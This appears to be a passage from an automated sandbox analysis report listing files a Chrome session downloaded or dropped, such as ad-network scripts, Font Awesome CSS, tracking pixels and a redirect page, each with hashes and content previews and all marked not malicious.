                                                                                                                                                                                                                                                                                                                      SHA-512:8A1287D7528B2B65D61D6E0A639F2CBE5658AFC3EDB5E2AF9494E8CC876AA6C8060A55D3BD4AA85A0B3B82733E64F7F7A6B4A5F2597FD99FD37136A83A6BBCAD
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var n=ba(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},u={};function w(a,b,c){if(!c||a!=null){c=u[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,writable:!0,value:b}):b!==c&&(u[d]
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (27377)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):27592
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.83669575258768
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:Euwu4Eyfd7PNRzAmReUtPAM0NuzwpmnWt:ETuqdNReUtPAM0v4E
                                                                                                                                                                                                                                                                                                                      MD5:5E5B0D8C7BE5919570A305B6BC229A36
                                                                                                                                                                                                                                                                                                                      SHA1:E4AB3A85D3AB0A8654A278D954FB310906526DB3
                                                                                                                                                                                                                                                                                                                      SHA-256:1AE3C19265723696F50E3226DCD43FBC7EA617697E0D7169A8E52C854AE3826C
                                                                                                                                                                                                                                                                                                                      SHA-512:7FB88208B7D2E585F6C2B49BAF85AEF8D374A1C3F565596B50FFE49F2B5B6B5E1B39DADFCCC0E9971000346957551DA6316A911CDEED502B1983EB1598F37D62
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v4-shims.min.css?token=8ce76d2187
                                                                                                                                                                                                                                                                                                                      Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa.fa-glass:before{content:"\f000"}.fa.fa-envelope-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-envelope-o:before{content:"\f0e0"}.fa.fa-star-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-home:before{content:"\f015"}.fa.fa-file-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 6 Free";font-weight:400}.fa.fa-arrow-circle-o-dow
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                      MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                      SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                      SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                      SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://widget.us.criteo.com/dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1
                                                                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                      MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                      SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                      SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                      SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3673)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):160392
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.599087929847065
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:xOWww+JsoKGFDisDc1MO3FC/lAVPrNoG8Uiqug9R9a7lAXmjuGSndT5RQRihw:xOWwwboKGFDisDc1MO3w9yrNoGriqJ9u
                                                                                                                                                                                                                                                                                                                      MD5:3E6EA3554017077B1DB339B6F302DCB2
                                                                                                                                                                                                                                                                                                                      SHA1:57A5CD8DDA768C84EED2760A4491F175C88D948F
                                                                                                                                                                                                                                                                                                                      SHA-256:63361D41FF9D87004D1380F9760B773B939324CA16A3670929BFDB10C4A353A3
                                                                                                                                                                                                                                                                                                                      SHA-512:0D3A3E105024F89FB0D1CA9211916D444F3FFBA9D2963B931FA3ACE0CAB08BC142D5622996B30CCC58481CFE0638959F0E6BBF8BE112644E9A83D8D633DDEE82
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(sttc){'use strict';var aa,ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",fa={},ha={};function ia(a,b,c){if(!c||a!=null){c=ha[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in fa?f=fa:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ea&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ba(fa,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ha[d]===void 0&&(a=Math.random()*1E9>>>0,ha[d]=ea?da.Symbol(d):"$jscp$"+a+
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=simplifi&google_hm=39F8AD7435EC43369D67DAA35699A1F7&google_push=AXcoOmSIhx_awINzXgzYWs7Ldkdetu8Y-SBwDodzM3mFTtUbrbhkp0OS6hSo2f96raiQfkDC1lzy9png7PoLVky3HNMKBXYnTJqxnD8
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):70
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.691494403886478
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:qVoBzEHjJMzVJu+1i7XaXF9jb:q4IMRJVi7qXFtb
                                                                                                                                                                                                                                                                                                                      MD5:743AF61F4FC1B261560694570F0A0D6A
                                                                                                                                                                                                                                                                                                                      SHA1:20AAADB4041BD3ECB15525A7C8DDDF5ED5F186D8
                                                                                                                                                                                                                                                                                                                      SHA-256:502EDF90CC75128B152612ACBCA431D3322459416E25064E5866548883A8922C
                                                                                                                                                                                                                                                                                                                      SHA-512:749F452843DF44FC5DFB9133DC3BF3F78EB38A6FA9177189F4CF18EC41D14E7CE82E973EDACC82B22DCBC9A7FC815A03330A3D981C9DBF3D7A238868A70CBA12
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://trksyln.net/tgmacro/download
                                                                                                                                                                                                                                                                                                                      Preview:<html>..<meta http-equiv="refresh" content="0; URL=/Error" />..</html>
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4158)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):182435
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.501612649847176
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:jbtEWyenHYGwdwCrDTdS4bp41p2nF58Ni1YtFrD1XgQqnbZfahtFJz1m2MDIV0MM:jbtEWyenHYGwdwCrDTdS4bu1pWFONi1d
                                                                                                                                                                                                                                                                                                                      MD5:EC759CF5D428B344EFF2AD4F7B20DD08
                                                                                                                                                                                                                                                                                                                      SHA1:50D3396B5F9C38811A0EEA6678F30693997C2907
                                                                                                                                                                                                                                                                                                                      SHA-256:94D7B3DC463F3C21D4F0503418E0FED038F9F233424163D74DAB12568E620685
                                                                                                                                                                                                                                                                                                                      SHA-512:CA8C5985D11C000BBD724D9F290E3DE6EA2A63984630E792C5C75E5B5B60AEC0E4F44D219A288F6CE11FE5F60EFEB8D73BD1A6FFA98BACCCD421FC05CA6F57CE
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://pagead2.googlesyndication.com/pagead/managed/js/adsense/m202410240101/reactive_library_fy2021.js
                                                                                                                                                                                                                                                                                                                      Preview:(function(sttc){'use strict';var r,aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ea={},fa={};function ha(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ia(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ea?f=ea:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(ea,d,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[d]===void 0&&(a=Math.random()*1E9>>>0,fa[d]=da?ca.Symbol(d):"$jscp$"+a+"
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):15406
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9650904047414803
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:96:vqjLLciHMHlbQo4Sy9S6IXl2qsl+PlBaEK4NySkc:vqrsH+Xj9NYocT2Skc
                                                                                                                                                                                                                                                                                                                      MD5:59382DD7DA8079DD45A8748ABDBBC76B
                                                                                                                                                                                                                                                                                                                      SHA1:508364D967AAA97168C5E1801CC24D0DA9C24D1E
                                                                                                                                                                                                                                                                                                                      SHA-256:DD8B5FBD942B954BF9AB87579DB1092B0AEBCBA2D5B31ABC68918A11341FF333
                                                                                                                                                                                                                                                                                                                      SHA-512:C681FBD11D3D89B97C53D62D2A2399098808BF56DE32B4D5395B5002CF3287A6B2ED04E5FB94A18F60585678FE211480F893B420B95B7FDFEC3D234E67493325
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... .........................fff....~................................................~fff....z...........................................................z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................|......
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:C++ source, ASCII text, with very long lines (2873)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):9031
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.527216820529872
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:192:B1/6bZSDg3eksiGBpuMo5gXKl7LOjbke3CT2itXedSlFI:B1/6bZSDqeYGBbnal7LCbkkCT2oXedS8
                                                                                                                                                                                                                                                                                                                      MD5:0A69A7A3530DE318072DE6182E31A0C6
                                                                                                                                                                                                                                                                                                                      SHA1:9BF1165A0064FB85DD8F29DDC6C45AD5B9574EE9
                                                                                                                                                                                                                                                                                                                      SHA-256:BF1E2557855835794A8A1D9C1403AC53373CCEA3006325357E5CB384E93D7514
                                                                                                                                                                                                                                                                                                                      SHA-512:9B24B0255A19285BF345BB199BAFF4DCCACBB55521FA0581E2AB196D5C28EC936749C6F9A21233261CBDE37033DA5C91D7F03A3A1FE4B25D8F325A7717760740
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://googleads.g.doubleclick.net/pagead/html/r20241028/r20190131/zrt_lookup_fy2021.html
                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><script>.(function(){'use strict';/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var l=this||self;var m,n;a:{for(var aa=["CLOSURE_FLAGS"],v=l,z=0;z<aa.length;z++)if(v=v[aa[z]],v==null){n=null;break a}n=v}var ba=n&&n[610401301];m=ba!=null?ba:!1;function ca(){var a=l.navigator;return a&&(a=a.userAgent)?a:""}var A;const da=l.navigator;A=da?da.userAgentData||null:null;function B(a){return m?A?A.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function C(a){return ca().indexOf(a)!=-1};function E(){return m?!!A&&A.brands.length>0:!1}function F(){return E()?B("Chromium"):(C("Chrome")||C("CriOS"))&&!(E()?0:C("Edge"))||C("Silk")};function ea(a,b){Array.prototype.forEach.call(a,b,void 0)};function G(a){G[" "](a);return a}G[" "]=function(){};var fa=ca().toLowerCase().indexOf("webkit")!=-1&&!C("Edge");!C("Android")||F();F();C("Safari")&&(F()||(E()?0:C("Coast"))||(E()?0:C("Opera"))||(E()?0:C("Edge"))||(E()?B("Microsoft Edge"):C("Edg/"))||E()&&B
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=yahoo&google_push=AXcoOmSC5XzHMFryMzDkGxghutUO-mvFIJ78eTpuHDkgVH0JaQqClGaoWQeMEbZOwXl-_6VPMlKnpXxaJBwSkNZeCT74kzVwrTTEcm0&google_hm=eS15MDF1d0VSRTJwR3VpcERhbjZhVkN6U2FPbHdJd0xjb35B
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:C++ source, ASCII text, with very long lines (2015)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):40512
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.518199113824284
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:8xMuZ0jicWJj1GV2eYcZOYnHKoOFAVUagrLG9JQcgNYTrfgUYyzkoDBRW0sbh3fK:A+xbYcAYb2ZT3ZE3
                                                                                                                                                                                                                                                                                                                      MD5:1614EFD8D8B318CA80C151AA5D983224
                                                                                                                                                                                                                                                                                                                      SHA1:E27E5A72190F00DDABC4187084B8BD3850388D05
                                                                                                                                                                                                                                                                                                                      SHA-256:B682B162DDD14D549C16FDCC70C01AAF1A7C1C5EE9D12F8A45081CAF38499FF4
                                                                                                                                                                                                                                                                                                                      SHA-512:32E34011CAD366D6AC1BB0FD694829D233C66BB51813596A8EA6631E2E8516A25308768C988E9866C6B868174E993BCB62443D92AFEAFC9209B0A1C30CECECAB
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/mysidia/1614efd8d8b318ca80c151aa5d983224.js?tag=addon/mysidia_one_click_handler_one_afma
                                                                                                                                                                                                                                                                                                                      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;const aa=(new Date("2024-01-01T00:00:00Z")).getTime();.function ba(a){a=a.s;const b=encodeURIComponent;let c="";a.platform&&(c+="&uap="+b(a.platform));a.platformVersion&&(c+="&uapv="+b(a.platformVersion));a.uaFullVersion&&(c+="&uafv="+b(a.uaFullVersion));a.architecture&&(c+="&uaa="+b(a.architecture));a.model&&(c+="&uam="+b(a.model));a.bitness&&(c+="&uab="+b(a.bitness));a.fullVersionList&&(c+="&uafvl="+b(a.fullVersionList.map(d=>b(d.brand)+";"+b(d.version)).join("|")));typeof a.wow64!=="undefined"&&(c+="&uaw="+Number(a.wow64));return c}.function ca(a,b){return a.g?a.m.slice(0,a.g.index)+b+a.m.slice(a.g.index):a.m+b}function da(a,b=0){let c="&act=1";b===0?c+="&ri=1":b===1?c+="&ri=24":b===2&&(c+="&ri=25");a.l&&a.s&&(c+=ba(a));a.h&&(c+="&suid="+a.o);return ca(a,c)}function ea(a,b){if(a.l&&a.i){if(b==1)return a.i||""}else if(a.h){if(b==1)return ca(a,"&dct=1&suid="+a.o);if(b==3)re
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1875)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):73462
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.570807633879379
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:d35XMc5e67JV7xoeTuqbg9Szvf4msUkRe6HFj:LXMUHVoeTuqzvTk86lj
                                                                                                                                                                                                                                                                                                                      MD5:F57E90FBF722A9DF84FC38A1FDBE3508
